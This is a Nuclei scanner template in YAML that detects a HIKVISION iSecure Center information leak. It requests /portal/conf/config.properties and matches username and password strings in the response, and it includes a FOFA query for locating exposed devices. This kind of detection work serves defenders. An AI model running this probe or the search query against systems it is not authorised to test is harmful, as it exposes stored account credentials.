nuclei-templates/http/vulnerabilities/hikvision/hikvision-isecure-info-leak...

36 lines
1.5 KiB
YAML

id: hikvision-isecure-info-leak
info:
name: HIKVISION iSecure Center - Information Leak
author: adeljck
severity: high
description: |
HIKVISION iSecure Center comprehensive security management platform is an "integrated" and "intelligent" platform. By accessing equipment such as video surveillance, all-in-one card, parking lot, alarm detection and other systems, Hikvision comprehensive security management platform information exists Information leakage (internal network centralized account password) vulnerability can be decrypted through decryption software, username and password.
reference:
- https://github.com/adeljck/Hikvision_Info_Leak
- https://github.com/wy876/POC/blob/main/%E6%B5%B7%E5%BA%B7%E5%A8%81%E8%A7%86%E7%BB%BC%E5%90%88%E5%AE%89%E9%98%B2%E7%AE%A1%E7%90%86%E5%B9%B3%E5%8F%B0%E4%BF%A1%E6%81%AF%E6%B3%84%E9%9C%B2.md
metadata:
verified: true
max-request: 1
fofa-query: app="HIKVISION-综合安防管理平台"
tags: infoleak,iot,hikvision
http:
- method: GET
path:
- "{{BaseURL}}/portal/conf/config.properties"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '@bic'
- 'username'
- 'password'
condition: and
- type: status
status:
- 200
# digest: 4a0a00473045022005b0e92f0ddbd6578fdc149b7eddf7d5c091a38bc7c69b0656e01ab04a189bb0022100e879f64938e3b6988168267fc153650ad248adc382337e296a7ed7afb074b6f1:922c64590222798bb761d5b6d8e72950